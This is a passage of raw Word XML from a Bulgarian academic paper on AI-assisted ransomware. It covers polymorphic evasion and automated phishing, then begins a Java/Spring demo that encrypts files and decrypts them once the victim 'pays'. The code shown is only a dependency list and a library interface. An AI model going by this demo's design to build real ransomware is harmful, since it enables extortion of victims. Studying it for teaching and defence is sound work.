      <w:r w:rsidR="00287727">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00231BD5">
        <w:t xml:space="preserve">ansomware. Както </w:t>
      </w:r>
      <w:r w:rsidR="00287727">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00287727">
        <w:t>експерти</w:t>
      </w:r>
      <w:r w:rsidRPr="00231BD5">
        <w:t>, така и</w:t>
      </w:r>
      <w:r w:rsidR="00A86ADF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A86ADF" w:rsidRPr="00A86ADF">
        <w:t xml:space="preserve">киберпрестъпници </w:t>
      </w:r>
      <w:r w:rsidRPr="00231BD5">
        <w:t>използват тази технология, за да подобрят своята производителност</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7921A5DD" w14:textId="71CCCD65" w:rsidR="00575D22" w:rsidRDefault="00A86ADF" w:rsidP="00575D22">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С навлизането на ИИ броят хакери се е </w:t>
      </w:r>
      <w:r w:rsidR="00CA720F">
        <w:t>увеличил</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> значително. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> се използва за</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> създаване на </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">нови </w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t>по-персонализирани тактики</w:t>
      </w:r>
      <w:r w:rsidR="00A0406E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A0406E">
        <w:t>И</w:t>
      </w:r>
      <w:r>
        <w:t>зползва се за експлоатация на</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> уязвимости и откупи</w:t>
      </w:r>
      <w:r>
        <w:t>те са станали още по-големи като сума</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001649F5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r w:rsidR="001649F5">
        <w:t xml:space="preserve"> атаките</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00231BD5">
        <w:t>достигат</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> рекордни върхове</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5">
        <w:t xml:space="preserve"> последните две години</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> и е много вероятно изкуственият интелект да </w:t>
      </w:r>
      <w:r w:rsidR="008C1CB1">
        <w:t>продължи</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> тази тенденция през 202</w:t>
      </w:r>
      <w:r w:rsidR="001649F5">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00231BD5" w:rsidRPr="00231BD5">
        <w:t xml:space="preserve"> г.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301BC58F" w14:textId="2F2872E2" w:rsidR="00561A30" w:rsidRDefault="00575D22" w:rsidP="00575D22">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Киберпрестъпниците използват </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> з</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">автоматизация на стратегии за изграждане на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00575D22">
        <w:t>което позволява бързо идентифициране на уязвимости и внедряване на силно персонализирани фишинг кампании.</w:t>
      </w:r>
      <w:r w:rsidR="00561A30" w:rsidRPr="00561A30">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-2000725777"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00561A30">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00561A30">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Bre25 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00561A30">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[12]</w:t>
          </w:r>
          <w:r w:rsidR="00561A30">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="5C9387AE" w14:textId="509A314F" w:rsidR="00575D22" w:rsidRDefault="00561A30" w:rsidP="00561A30">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ето някои от начините, </w:t>
      </w:r>
      <w:r w:rsidR="00BA71F4">
        <w:t>по</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> които хакерите използват </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r w:rsidR="009732FC">
        <w:t xml:space="preserve"> за автоматизация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5C4842" w14:textId="699AC2EB" w:rsidR="00561A30" w:rsidRPr="00561A30" w:rsidRDefault="00561A30" w:rsidP="00561A30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Полиморфен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AI ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="008A2B07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2B07" w:rsidRPr="008A2B07">
        <w:t>Класическите методи за засичане на ransomware се основават на разпознаване на характерни модели, наблюдавани при предишни атаки</w:t>
      </w:r>
      <w:r>
        <w:t>. За да избегнат евентуална детекция</w:t>
      </w:r>
      <w:r w:rsidR="006D760F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> към </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> се прилага </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AI,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ко</w:t>
      </w:r>
      <w:r w:rsidR="006D760F">
        <w:t>й</w:t>
      </w:r>
      <w:r>
        <w:t>то непрестанно модифицира кода си, за да избегне</w:t>
      </w:r>
      <w:r w:rsidR="006D760F">
        <w:t xml:space="preserve"> разпознаване от антивирусни</w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t xml:space="preserve"> програми</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543CEA83" w14:textId="2D7B757F" w:rsidR="00561A30" w:rsidRPr="00561A30" w:rsidRDefault="00561A30" w:rsidP="00561A30">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Автоматизация</w:t>
      </w:r>
      <w:r w:rsidR="001E40B5">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> позволява на хакерите да автоматизират и персонализират производството на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r w:rsidR="00405083">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00405083">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00405083">
        <w:t>Инструментите за автоматизация позволят бързо сканиране на уязвимости, ефикасно изпълнение на атаки и адаптация в реално време въз основа на защитните механизми. Това позволява множество атаки на различни организации едновреме</w:t>
      </w:r>
      <w:r w:rsidR="008E4679">
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidR="00405083">
        <w:t>но.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F422BE" w14:textId="77777777" w:rsidR="00575D22" w:rsidRDefault="00575D22" w:rsidP="00575D22">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A28FE87" w14:textId="77777777" w:rsidR="00575D22" w:rsidRDefault="00575D22" w:rsidP="00575D22">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00575D22">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02891911" wp14:editId="4B6B4122">
            <wp:extent cx="5427980" cy="2679773"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6350"/>
            <wp:docPr id="1971879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5764" r="2797" b="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30" cy="268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6EC87" w14:textId="3D474947" w:rsidR="006963F5" w:rsidRPr="00BA0B76" w:rsidRDefault="00575D22" w:rsidP="00BA0B76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8</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>40%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от фишинг атаките са генерирани от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09042D6A" w14:textId="77777777" w:rsidR="006963F5" w:rsidRDefault="006963F5" w:rsidP="006963F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc224154936"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Имплементация на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="32AED695" w14:textId="389CEBED" w:rsidR="003234F3" w:rsidRDefault="006963F5" w:rsidP="006963F5">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">За имплементацията на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е използван </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Java 21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spring Framework.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Целта на имплементацията е да се покаже колко лесно може да се създаде софтуер за </w:t>
      </w:r>
      <w:r w:rsidR="006F5481">
        <w:t xml:space="preserve">симетрично </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">криптиране и декриптиране на файлове, който да </w:t>
      </w:r>
      <w:r w:rsidR="00954D13">
        <w:t xml:space="preserve">бъде </w:t>
      </w:r>
      <w:r>
        <w:t>използва</w:t>
      </w:r>
      <w:r w:rsidR="00954D13">
        <w:t>н</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:r w:rsidR="00954D13">
        <w:t xml:space="preserve"> атаки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00954D13">
        <w:t xml:space="preserve"> Такъв тип атака е прилаган </w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidR="00B137EB">
        <w:t xml:space="preserve"> началото на </w:t>
      </w:r>
      <w:r w:rsidR="00B137EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XXI</w:t>
      </w:r>
      <w:r w:rsidR="00B137EB">
        <w:t xml:space="preserve"> век</w:t>
      </w:r>
      <w:r w:rsidR="00954D13">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C5B3E" w14:textId="7713BFC8" w:rsidR="006963F5" w:rsidRPr="00072C9F" w:rsidRDefault="006963F5" w:rsidP="003234F3">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>В демото има три текстови файла</w:t>
      </w:r>
      <w:r w:rsidR="00B53532">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> При стартиран</w:t>
      </w:r>
      <w:r w:rsidR="00B53532">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на приложението се криптират</w:t>
      </w:r>
      <w:r w:rsidR="00386EB1">
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> когато потребителят „плати“, тогава се декриптират обратно в текстови.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59870DBA" w14:textId="77777777" w:rsidR="006963F5" w:rsidRDefault="006963F5" w:rsidP="00437A39">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="006963F5">
        <w:t>&lt;dependencies&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">    &lt;dependency&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>org.springframework.security</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>artifactId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;spring-security-crypto&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>artifactId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;version&gt;6.4.2&lt;/version&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">    &lt;/dependency&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">    &lt;dependency&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>org.projectlombok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>artifactId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>lombok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>artifactId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;version&gt;1.18.36&lt;/version&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;scope&gt;provided&lt;/scope&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">    &lt;/dependency&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">    &lt;dependency&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>ch.qos.logback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>artifactId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>logback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>-classic&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>artifactId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006963F5">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">        &lt;version&gt;1.5.16&lt;/version&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t xml:space="preserve">    &lt;/dependency&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006963F5">
        <w:br/>
        <w:t>&lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23737B36" w14:textId="01AB756A" w:rsidR="008874DA" w:rsidRPr="007B7F08" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc223382614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9</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t xml:space="preserve">Използвани </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007B7F08" w:rsidRPr="006963F5">
        <w:t>dependencies</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t xml:space="preserve">в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pom.xml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidR="007B7F08">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8E2F0D" w14:textId="2B05FC25" w:rsidR="00DD2032" w:rsidRPr="00DD2032" w:rsidRDefault="00DD2032" w:rsidP="00DD2032">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2032">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>От</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2032">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pring-security-crypto</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2032">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">е използван интерфейса </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD2032">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextEncryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> и класа </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2032">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Encryptors</w:t>
      </w:r>
      <w:r>
        <w:t>. Интерфейсът се използва за симетрично криптиране на стрингове.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC7828" w14:textId="1592ED51" w:rsidR="00437A39" w:rsidRPr="00437A39" w:rsidRDefault="00437A39" w:rsidP="00437A39">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00437A39">
        <w:t xml:space="preserve">public interface </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437A39">
        <w:t>TextEncryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437A39">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00437A39">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00437A39">
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00437A39">
        <w:t>encrypt(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00437A39">
        <w:t>String text);</w:t>
      </w:r>
      <w:r w:rsidRPr="00437A39">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00437A39">
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00437A39">
        <w:t>decrypt(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00437A39">
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437A39">
        <w:t>encryptedText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00437A39">
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00437A39">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B064C9" w14:textId="601A6E90" w:rsidR="00437A39" w:rsidRDefault="00437A39" w:rsidP="00437A39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10</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Интерфейс </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00437A39">
        <w:t>TextEncryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7F08">
        <w:t>.</w:t>
      </w:r>
